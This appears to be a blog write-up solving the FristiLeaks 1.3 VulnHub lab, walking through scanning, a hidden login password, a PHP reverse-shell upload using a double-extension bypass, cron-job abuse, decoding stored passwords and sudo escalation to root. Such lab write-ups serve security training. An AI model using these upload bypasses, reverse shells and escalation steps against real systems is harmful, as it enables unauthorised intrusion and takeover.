VulnHub Writeup : FristiLeaks 1.3

Box Stats :

Box InformationDetails
Box NameFristiLeaks 1.3
SeriesFristiLeaks
Release Date14 Dec 2015
AuthorAr0xA
DifficultyBasic
Download LinkLink

Nmap Scan

IP of target vm is `192.168.1.11`, now performing nmap scan

$ nmap -sS -A --top-ports 1000 -oN nmap.txt 192.168.1.11   

# Nmap 7.91 scan initiated Wed Nov 17 13:52:14 2021 as: nmap -sS -A --top-ports 1000 -oN nmap.txt 192.168.1.11
Nmap scan report for 192.168.1.11
Host is up (0.0039s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: 
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries 
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   3.85 ms 192.168.1.11

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Nov 17 13:52:43 2021 -- 1 IP address (1 host up) scanned in 29.36 seconds

Findings :

  • Open ports : 80
  • Robots.txt file : /cola, sisi, /beer

Now checking web server on port 80

There is a webpage

But there nothing significant info. Now try to access directories from robots.txt, but all shows an image and nothing else.

Nikto Scan

$ nikto -url http://192.168.1.11/ -output nikto.txt 

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.11
+ Target Hostname:    192.168.1.11
+ Target Port:        80
+ Start Time:         2021-11-19 08:45:50 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 3 entries which should be manually viewed.
+ PHP/5.3.3 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8727 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2021-11-19 08:46:16 (GMT-5) (26 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Directory Bruteforcing

Directory bruteforing using ffuf, i am using common.txt wordlist from Seclists. Also using cewl to add some new words

cewl http://192.168.1.11/ | anew common.txt  

Now bruteforcing

$ ffuf -c -u http://192.168.1.11/FUZZ -ac -se -w common.txt -of csv -o ffuf.txt                                                                                                         1 ⨯

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.1.11/FUZZ
 :: Wordlist         : FUZZ: common.txt
 :: Output file      : ffuf.txt
 :: File format      : csv
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response size: 227
 :: Filter           : Response words: 15
 :: Filter           : Response lines: 9
________________________________________________

                        [Status: 200, Size: 703, Words: 66, Lines: 16]
images                  [Status: 301, Size: 235, Words: 14, Lines: 8]
index.html              [Status: 200, Size: 703, Words: 66, Lines: 16]
robots.txt              [Status: 200, Size: 62, Words: 5, Lines: 5]
:: Progress: [4653/4653] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
  • These is image directory found with some images.
  • I also fuzzed sisi, beer and cola but nothing much found.

Now at this point i do not found nothing, so i lookup some writeups and i see that there is a directory named fristi ..!!

It has login panel, now try to sqlmap in it.

$ cat header      

POST /fristi/checklogin.php HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.11/fristi/
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.1.11
Connection: keep-alive
Cookie: PHPSESSID=rjob78365dj1t9njiqa1mk6980
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

myusername=hello&mypassword=man&Submit=Login   

$ sqlmap -r header -p myusername 

Nothing found amd with the field mypassword also nothing found.

Now observing the source code we get a username eeqeepz and down on the page there is an unused base64 string, so lets decode it.

$ echo """iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==""" | base64 -d           
PNG

IHDRm4AsRGBgAMA
               a        pHYsodRIDATx^Qv a
                                         zl&I%KH@f455VI
                                                       s~E"Gx#/r9E"Gx#/r9E"Gx#/&T3h#3՗j
                                                                                       ~ݿ~2ZeLZZUW$oy{K}fP9{6XKKL>a%ZD
'*%&RxgյV3]#qpzR\Zb    -]յJH9r(I5seGtXq"k6j                     6                                                     ŚB5o:å0VKKL>e׵KZt1n
FnT3Wגߞj                                   g=YxibѢꍗjH-YJH5ӅxD7(
        ߠMI6D3
              MJH5ӅZl3GYdMo6TrR
                               /-5ӅJI,i9lѢYD![

otWK}fh}d [T5!Ռuɘ-ӇӋ,C-GR,kj\g}<g.Ռuɘ-V_uZ#|_AӜ'cjƸdЖJ{<7
9C}fP4p]OI5c\2hKGtb#*   :RJjƺ$#+o`L*9I:,>U騢"3jƼdȖ#۞j)'zUqF>LZ[Z4LZR}fˑS;|f.-hFEZT_>sda6(.U^n|/ZZ=#;tT_>Trd+?87j-}dRt!#/r9E"Gx#/r9E"Gx#/r9E"Gx#/r9EZ8rqIENDB`    

and as we can see it shows the header PNG, means its an image file, now store it on a file

echo """iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==""" | base64 -d > image.png

After opening this image file we get a string keKkeKKeKKeKkEkkEk now lets try to login with eeqeepz and password keKkeKKeKKeKkEkkEk

We succeed and it gives up image upload page, uploaded image can be accessed using http://192.168.1.11/fristi/uploads/sample_image.jpg. Now lets try to upload a php backdoor (backend has php, revealed on nikto scan). I am using rshell tool which generates php backdoor file : https://github.com/ajaytekam/rshell

./rshell.py -ip 192.168.1.9 -p 9999 -o image.php
[+] Payload Stored on "image.php"

Now try to upload it

and the error message shows it only accept the png, jpg and gif files. Now lets make copies of backdoor file with names image.jpg, image.jpg.php and image.php.jpq and start a listener and see which file is gets accepted and executed.

  • image.jpg gets excepted but not executed. It shows error message
  • image.jpg.php did not get accepted
  • image.php.jpg gets accepted and executed and gives us a reverse shell on the system

Now opening the backdoor file at http://192.168.1.11/fristi/uploads/image.php.jpg we get a reverse shell

Privilege Escalation

Doing some basic reconnaissance on the system

  • Listing all users
bash-4.1$ awk -F: '{print $1}' /etc/passwd
awk -F: '{print $1}' /etc/passwd
root
bin
daemon
adm
lp
sync
shutdown
halt
mail
uucp
operator
games
gopher
ftp
nobody
vcsa
saslauth
postfix
sshd
apache
mysql
vboxadd
eezeepz
admin
fristigod
fristi 

Users found : root, eezeepz, admin, fristigod, fristi

  • Checking Home Directory
sh-4.1$ cd home 
sh-4.1$ ls
admin
eezeepz
fristigod

Now checking users

sh-4.1$ cd fristigod
sh: cd: fristigod: Permission denied
sh-4.1$ cd admin
sh: cd: admin: Permission denied
sh-4.1$ 

In admin and fristigod permission is denied, now checking ezeepz

sh-4.1$ ls -al
ls -al
total 2608
drwx---r-x. 5 eezeepz eezeepz  12288 Nov 18  2015 .
drwxr-xr-x. 5 root    root      4096 Nov 19  2015 ..
drwxrwxr-x. 2 eezeepz eezeepz   4096 Nov 17  2015 .Old
-rw-r--r--. 1 eezeepz eezeepz     18 Sep 22  2015 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz    176 Sep 22  2015 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz    124 Sep 22  2015 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz   4096 Nov 17  2015 .gnome
drwxrwxr-x. 2 eezeepz eezeepz   4096 Nov 17  2015 .settings
-rwxr-xr-x. 1 eezeepz eezeepz  24376 Nov 17  2015 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz  33559 Nov 17  2015 cbq
-rwxr-xr-x. 1 eezeepz eezeepz   6976 Nov 17  2015 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz  56720 Nov 17  2015 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz  25072 Nov 17  2015 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz  52936 Nov 17  2015 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz  31800 Nov 17  2015 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz  48712 Nov 17  2015 chmod
-rwxr-xr-x. 1 eezeepz eezeepz  53640 Nov 17  2015 chown
-rwxr-xr-x. 1 eezeepz eezeepz  44528 Nov 17  2015 clock
-rwxr-xr-x. 1 eezeepz eezeepz   4808 Nov 17  2015 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 129992 Nov 17  2015 cpio
-rwxr-xr-x. 1 eezeepz eezeepz  38608 Nov 17  2015 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz   5344 Nov 17  2015 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz  41704 Nov 17  2015 cut
-rwxr-xr-x. 1 eezeepz eezeepz  14832 Nov 17  2015 halt
-rwxr-xr-x. 1 eezeepz eezeepz  13712 Nov 17  2015 hostname
-rwxr-xr-x. 1 eezeepz eezeepz  44528 Nov 17  2015 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz   7920 Nov 17  2015 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz  11576 Nov 17  2015 kill
-rwxr-xr-x. 1 eezeepz eezeepz  16472 Nov 17  2015 killall5
-rwxr-xr-x. 1 eezeepz eezeepz  32928 Nov 17  2015 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz  11464 Nov 17  2015 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 171784 Nov 17  2015 nano
-rwxr-xr-x. 1 eezeepz eezeepz   5512 Nov 17  2015 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 123360 Nov 17  2015 netstat
-rwxr-xr-x. 1 eezeepz eezeepz  13892 Nov 17  2015 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz  25208 Nov 17  2015 nice
-rwxr-xr-x. 1 eezeepz eezeepz  13712 Nov 17  2015 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz   4736 Nov 17  2015 nologin
-r--r--r--. 1 eezeepz eezeepz    514 Nov 18  2015 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 390616 Nov 17  2015 tar
-rwxr-xr-x. 1 eezeepz eezeepz  11352 Nov 17  2015 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 249000 Nov 17  2015 tc
-rwxr-xr-x. 1 eezeepz eezeepz  51536 Nov 17  2015 telinit
-rwxr-xr-x. 1 eezeepz eezeepz  47928 Nov 17  2015 touch
-rwxr-xr-x. 1 eezeepz eezeepz  11440 Nov 17  2015 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz  12304 Nov 17  2015 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz  21112 Nov 17  2015 true
-rwxr-xr-x. 1 eezeepz eezeepz  35608 Nov 17  2015 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz  15410 Nov 17  2015 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz  12216 Nov 17  2015 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 504400 Nov 17  2015 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz  13712 Nov 17  2015 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz     62 Nov 17  2015 zcat
-rwxr-xr-x. 1 eezeepz eezeepz  47520 Nov 17  2015 zic
sh-4.1$ 

There is an interesting file named notes.txt

ash-4.1$ cat notes.txt
cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/\* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

It means we can run the above given command by setting a cron file in as /tmp/runthis which is run by user admin and the command output is stored on /tmp/cronresult file, the runnable commands are chmod, df, cat, echo, ps, grep and egrep. So basically we can give access to admin home folder using /home/admin/chmod -R 777 /home/admin.

bash-4.1$ echo '/home/admin/chmod -R 777 /home/admin' > /tmp/runthis
echo '/home/admin/chmod -R 777 /home/admin' > /tmp/runthis
bash-4.1$ cat /tmp/cronresult
executing: /home/admin/chmod -R 777 /home/admin
bash-4.1$ rm /tmp/runthis
rm /tmp/runthis
bash-4.1$
bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin  eezeepz  fristigod
bash-4.1$ cd admin
cd admin
bash-4.1$ ls -al
ls -al
total 656
drwxrwxrwx. 2 admin     admin       4096 Nov 19 17:08 .
drwxr-xr-x. 5 root      root        4096 Nov 19  2015 ..
-rwxrwxrwx  1 admin     admin       1117 Nov 19 17:53 .bash_history
-rwxrwxrwx. 1 admin     admin         18 Sep 22  2015 .bash_logout
-rwxrwxrwx. 1 admin     admin        176 Sep 22  2015 .bash_profile
-rwxrwxrwx. 1 admin     admin        124 Sep 22  2015 .bashrc
-rwxrwxrwx  1 admin     admin      45224 Nov 18  2015 cat
-rwxrwxrwx  1 admin     admin      48712 Nov 18  2015 chmod
-rwxrwxrwx  1 admin     admin        737 Nov 18  2015 cronjob.py
-rwxrwxrwx  1 admin     admin         21 Nov 18  2015 cryptedpass.txt
-rwxrwxrwx  1 admin     admin        258 Nov 18  2015 cryptpass.py
-rwxrwxrwx  1 admin     admin      90544 Nov 18  2015 df
-rwxrwxrwx  1 admin     admin      24136 Nov 18  2015 echo
-rwxrwxrwx  1 admin     admin     163600 Nov 18  2015 egrep
-rwxrwxrwx  1 admin     admin     163600 Nov 18  2015 grep
-rwxrwxrwx  1 admin     admin      85304 Nov 18  2015 ps
-rwxrwxrwx  1 admin     admin          0 Nov 19 16:49 res
-rw-r--r--  1 fristigod fristigod     25 Nov 19  2015 whoisyourgodnow.txt
bash-4.1$ 

There are two files with encrypted data

$ cat cryptedpass.txt 
cat cryptedpass.txt 
mVGZ3O3omkJLmy2pcuTq
bash-4.1$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG

And there is a python script which seems to used as an string encoder

bash-4.1$ cat cryptpass.py
cat cryptpass.py
# Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult
bash-4.1$

So at above the encodeString function basically ecode string to base64 then reverse the string and again encode it with rot13 encoding. So to reverse the encoding we need to follow below steps :

  • Decode stript to rot13
  • Reverse the decoded string
  • Again decode to base64

Now you can get the original string : decodeString.py

#!/usr/bin/python3  
import base64,codecs,sys

def decode(str):
    str1=codecs.decode(str, 'rot13')
    print(base64.b64decode(str1[::-1])) 

decode(sys.argv[1])

Now decoding the string

$ ./decodeString.py mVGZ3O3omkJLmy2pcuTq 
b'thisisalsopw123'

$ ./decodeString.py =RFn0AKnlMHMPIzpyuTI0ITG 
b'LetThereBeFristi!'

Now we get the password for

admin : thisisalsopw123   
fristigod : LetThereBeFristi!  

Checking the sudoer programs and users

Use the command sudo -l

bash-4.1$ su admin
su admin
Password: thisisalsopw123

[admin@localhost ~]$ sudo -l
sudo -l
[sudo] password for admin: thisisalsopw123

Sorry, user admin may not run sudo on localhost.

admin has not any program. Now checking for fristigod

[admin@localhost ~]$ exit
exit
exit
bash-4.1$ su fristigod 
su fristigod 
Password: LetThereBeFristi!

bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!

Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ 

There is a program called doCom for user fristi, but fristigod can also run this, so now lets try execute the program

bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
Usage: ./program_name terminal_command ...
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1£ id    
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)

As we can see that we got the root shell. Now search for the flag

ash-4.1£ cd /root
cd /root
bash-4.1£ ls
ls
fristileaks_secrets.txt
bash-4.1£ cat fristileaks_secrets.txt
cat fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of £fristileaks (twitter) and £vulnhub (FreeNode)

Flag: Y0u_kn0w_y0u_l0ve_fr1st1


bash-4.1£ 

Thats it, we found the flag…

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.